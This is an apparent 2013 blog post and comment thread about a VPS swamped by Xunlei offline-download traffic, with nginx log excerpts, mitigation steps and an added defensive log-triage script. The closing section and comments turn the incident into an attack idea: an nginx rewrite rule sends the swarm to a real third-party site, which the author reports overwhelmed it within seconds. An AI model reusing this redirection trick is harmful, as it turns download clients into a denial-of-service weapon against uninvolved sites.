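How it started
Last week, a complete, non-cam version of a fairly well-known movie was said to be out, so I found a download link on a certain "Tiantang" movie site. The link had already expired, though. A friend gave me a Xunlei VIP account, so I decided to check whether the file was a cam rip. I pasted the Tiantang link into Xunlei and, sure enough, Xunlei had already cached it. I then tried Xunlei's quick-play feature, but it reported a source address error and could not quick-play.
My blog's VPS had plenty of traffic left (I had used less than 3G of 500G), so I downloaded the movie with the VPS and then had Xunlei offline download fetch it from my blog's address.
While Xunlei was doing the offline download, the VPS's outbound traffic was fairly stable and basically matched the download speed shown on the offline download page.
Everything was fine; the offline download finished quickly, and at that point I noticed nothing unusual on the VPS.

A small problem
After a quick look with quick-play: OK, not a cam rip, fairly satisfied, so I started downloading it on my home computer.
I also turned on the acceleration channel.....
Then I noticed a problem: as soon as the download started, the website immediately became unreachable, and as soon as I paused it, the site immediately recovered.
At the time I assumed Xunlei was saturating the VPS's outbound bandwidth, so I didn't pay much attention.
Jiankongbao sent an alert that the server was unavailable; I still ignored it.
I went back to my homework.

Something is wrong
I did homework for a while. After a bit more than half an hour I figured the movie had finished downloading, opened my website on my phone, and found it still would not load.
I concluded that something had gone wrong, reluctantly opened the SolusVM panel, and got the scare of my life.
Instantaneous outbound traffic had reached 40M/S, and 100G of my traffic had been used up…..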

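Sensing that something was off, I immediately switched to my computer to deal with it....

DDoS deflate defeated
I have long been in the habit of using DDoS deflate to defend against small-scale attacks.
I checked iptables -L: not many IPs had been banned, so I lowered the threshold, but it still did not help.
So I started the painful job of banning IPs by hand, but the effect was still not noticeable, and even after restarting nginx the site would not load.

CPU usage > 85%
I ran top: several php-fpm processes were using a great deal of CPU.

Looking for a signature
I pulled the logs down to take a look. Annoyingly, because the system time was wrong, I did not spot the attack signature at first.
It was around 14:00 at the time, but the server clock said only 9:00.
Painful……
Only when I scrolled to the very bottom did I find massive numbers of requests for the video's download URL, with the suffix rmvb.
So I promptly wrote an nginx rule to return 403 for anything with the rmvb suffix.

First results
After banning access to *.rmvb, CPU usage dropped at once and went back to normal.
After rebooting the server, all the sites on it were reachable again.

Trouble again
Off to school, off to school……
When I got back today, I found that 4G of stuff had suddenly appeared. I looked into it and was floored.
The mighty access.log was taking up 4G of space...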

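What am I supposed to do with that……….
I renamed it, restarted nginx so that a fresh log was generated, pulled that down and had a look.....

Part of the log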

121.34.191.96 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; KB974488)"
180.110.85.117 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xE8\\x87\\xB4\\xE6\\x88\\x91\\xE4\\xBB\\xAC\\xE7\\xBB\\x88\\xE5\\xB0\\x86\\xE9\\x80\\x9D\\xE5\\x8E\\xBB\\xE7\\x9A\\x84\\xE9\\x9D\\x92\\xE6\\x98\\xA5.HD.1024x576.\\xE5\\x9B\\xBD\\xE8\\xAF\\xAD\\xE4\\xB8\\xAD\\xE5\\xAD\\x97.rmvb HTTP/1.1" 403 564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"
110.184.8.46 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xE8\\x87\\xB4\\xE6\\x88\\x91\\xE4\\xBB\\xAC\\xE7\\xBB\\x88\\xE5\\xB0\\x86\\xE9\\x80\\x9D\\xE5\\x8E\\xBB\\xE7\\x9A\\x84\\xE9\\x9D\\x92\\xE6\\x98\\xA5.HD.1024x576.\\xE5\\x9B\\xBD\\xE8\\xAF\\xAD\\xE4\\xB8\\xAD\\xE5\\xAD\\x97.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0E; BRI/2; InfoPath.2; .NET4.0C; youxihe.1437; Media Center PC 6.0; MASP; youxihe.1437)"
61.187.6.123 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xD6\\xC2\\xCE\\xD2\\xC3\\xC7\\xD6\\xD5\\xBD\\xAB\\xCA\\xC5\\xC8\\xA5\\xB5\\xC4\\xC7\\xE0\\xB4\\xBA.HD.1024x576.\\xB9\\xFA\\xD3\\xEF\\xD6\\xD0\\xD7\\xD6.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.136.145.119 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"
218.108.168.178 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
180.110.85.117 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"
113.120.105.197 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
59.56.115.134 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
61.131.97.40 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)"
114.83.179.112 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xD6\\xC2\\xCE\\xD2\\xC3\\xC7\\xD6\\xD5\\xBD\\xAB\\xCA\\xC5\\xC8\\xA5\\xB5\\xC4\\xC7\\xE0\\xB4\\xBA.HD.1024x576.\\xB9\\xFA\\xD3\\xEF\\xD6\\xD0\\xD7\\xD6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; youxihe.1577)"

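The 403 is returned promptly, but N requests per second from all over the place is still more than you can take, isn't it....
Logging has been disabled for now…….
Deleted that 4G log…..
The same problem exists with Baidu Cloud offline download, which I have tested. The post I published earlier on my site, "Metasploit Devil Training Camp penetration testing PDF download (with attack and defense demo environment)", had attachments totaling 12.5G, all hosted on the server. After they were fetched through Baidu Cloud offline download, N IPs requested the downloads every day and several hundred G of traffic flowed out daily. In the end I couldn't take it anymore, deleted the links outright, and changed the attachment addresses to Baidu Cloud addresses.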
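An added example, not part of the original post: a log triage script for the pattern in the excerpt above, where many distinct client IPs each request one file whose name is spelled with GBK or UTF-8 percent-encoding or with nginx `\xHH` escapes. The sample log lines, the thresholds `min_ips` and `min_ratio`, and all function names are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_to_bytes

# nginx "combined" log format, the format of the excerpts in this post.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+) '
    r'"[^"]*" "[^"]*"'
)
# nginx writes raw bytes >= 0x80 in the request line as \xHH.
HEX_ESC = re.compile(rb"\\x([0-9A-Fa-f]{2})")


def normalize_path(target):
    """Collapse %-encoded, \\xHH-escaped, GBK and UTF-8 spellings of one path."""
    raw = unquote_to_bytes(target.split("?", 1)[0])
    raw = HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    for enc in ("utf-8", "gbk"):
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            continue
    return raw.decode("latin-1")


def find_swarms(lines, min_ips=5, min_ratio=0.5):
    """Return paths hit by many distinct IPs that each send only a few requests."""
    stats = defaultdict(lambda: {"hits": 0, "ips": set(), "bytes": 0,
                                 "per_sec": defaultdict(int)})
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        s = stats[normalize_path(m["target"])]
        s["hits"] += 1
        s["ips"].add(m["ip"])
        s["bytes"] += int(m["size"])
        s["per_sec"][m["ts"]] += 1  # timestamps have one-second resolution
    report = []
    for path, s in stats.items():
        n_ips = len(s["ips"])
        if n_ips >= min_ips and n_ips / s["hits"] >= min_ratio:
            report.append({"path": path, "hits": s["hits"],
                           "distinct_ips": n_ips,
                           "peak_rps": max(s["per_sec"].values()),
                           "bytes_out": s["bytes"]})
    return sorted(report, key=lambda r: r["hits"], reverse=True)


def build_sample():
    """Constructed log lines (documentation IP ranges), not taken from the post."""
    path = "/wp-content/uploads/demo/国语.rmvb"
    gbk = path.encode("gbk")
    variants = [
        quote(path.encode("utf-8")),                      # UTF-8, %-encoded
        quote(gbk),                                       # GBK, %-encoded
        "".join(chr(b) if b < 0x80 else "\\x%02X" % b for b in gbk),  # raw GBK
    ]
    fmt = ('{ip} - - [24/May/2013:19:28:{sec:02d} +0800] '
           '"GET {target} HTTP/1.1" {st} {sz} "-" "Mozilla/4.0"')
    lines = [fmt.format(ip="203.0.113.%d" % (10 + i), sec=42 + i // 6,
                        target=variants[i % 3], st=403, sz=564)
             for i in range(9)]
    # One ordinary visitor reloading a page: few IPs, so it is not flagged.
    lines += [fmt.format(ip="198.51.100.7", sec=42 + i, target="/index.php",
                         st=200, sz=10110) for i in range(3)]
    return lines


if __name__ == "__main__":
    for row in find_swarms(build_sample()):
        print(row)
```

Because each client sends only a few requests, per-IP connection thresholds of the kind DDoS deflate applies rarely trip; grouping by the decoded path is what exposes the flood.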
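Afterword
I wondered why so many machines in different places were requesting this URL; nobody but me knew about it, and I had never told anyone.
It must be down to Xunlei. The movie was fairly popular at the time. Probably, during the offline download, the MD5 of the file fetched from my server matched the MD5 of the movie from the Tiantang site, so Xunlei treated me as one of the source addresses, and when users submit download requests to the offline server, some of those requests get redirected to my server.
I picked an IP from the log and looked it up: some broadband ISP, so it is probably not an official Xunlei server but a user's machine..
Of course, all of the above is only my guess; if anything is wrong, please point it out and let's discuss…
This URL is still getting N requests per second. Imagine rewriting this URL to some site you dislike: would that amount to a CC attack?
If that idea holds, that is, you offline-download a popular file via your own VPS, part of the download requests come to you, and you rewrite them to someone else's site, wouldn't that make for a very powerful attack?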

Comments:
1#
imlonghao (imlonghao.com link exchange) | 2013-05-24 21:36
Tried rewriting to someone else's site; it choked within seconds.....
2#
imlonghao (imlonghao.com link exchange) | 2013-05-24 21:39
location ~* \.(rmvb)$ {
    rewrite ^/ http://www.wooyun.org/searchbug.php?q=%25;
}
3#
insight-labs (Root Yourself in Success) | 2013-05-24 21:42
Does Xunlei follow the rewrite?
4#
insight-labs (Root Yourself in Success) | 2013-05-24 21:44
@imlonghao
Have to say, though, this idea is extremely dirty
If it does follow the rewrite, then there's the capital to DDoS the GFW……
5#
xsser (Ten phalluses differ in length!!) | 2013-05-24 21:51
@imlonghao damn
6#
imlonghao (imlonghao.com link exchange) | 2013-05-24 22:02
@insight-labs I'll set up one more small site and check the logs, then we'll know..
7#
imlonghao (imlonghao.com link exchange) | 2013-05-24 22:09
@xsser @insight-labs
182.149.204.207 - - [24/May/2013:22:05:49 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
219.151.158.144 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
182.149.204.207 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
113.138.50.183 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
27.153.68.113 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
182.149.204.207 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.156.53.206 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
1.203.40.140 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; InfoPath.2)"
219.151.158.144 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
123.149.228.64 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
183.157.115.3 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
111.172.197.39 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
182.149.204.207 - - [24/May/2013:22:05:56 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
220.189.193.67 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; KB974487)"
183.157.115.3 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
121.237.2.43 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
222.80.175.25 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"
183.156.53.206 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
180.157.89.162 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"
113.76.33.74 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASP)"
61.185.178.173 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; 4399Box.1261; 4399Box.1261)"
113.86.145.177 - - [24/May/2013:22:06:01 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
58.19.214.162 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 206 "-" "Mozilla/4.0"
61.153.0.130 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
182.149.204.207 - - [24/May/2013:22:06:05 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.156.53.206 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
182.149.204.207 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
59.56.20.23 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
112.65.211.100 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; qdesk 2.4.1263.203; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
115.206.20.133 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.4)"
182.149.204.207 - - [24/May/2013:22:06:09 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
182.149.204.207 - - [24/May/2013:22:06:10 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
14.147.86.62 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; QQPinyin 685; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
183.156.53.206 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
111.178.209.148 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
182.149.204.207 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.157.115.3 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
183.17.47.78 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.19.214.162 - - [24/May/2013:22:06:15 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
27.188.231.155 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MALN; .NET4.0E; Zune 4.7; InfoPath.1)"
111.172.197.39 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
58.48.1.93 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
222.69.92.85 - - [24/May/2013:22:06:17 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.153.149.166 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Apache; .NET CLR 2.0.50727)"
58.48.106.206 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; KB974488)"
113.65.198.144 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
182.149.204.207 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
114.233.127.15 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
61.145.38.137 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
117.65.195.17 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
101.85.201.140 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
182.149.204.207 - - [24/May/2013:22:06:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
222.70.224.156 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MATP)"
116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
183.156.9.151 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"
116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
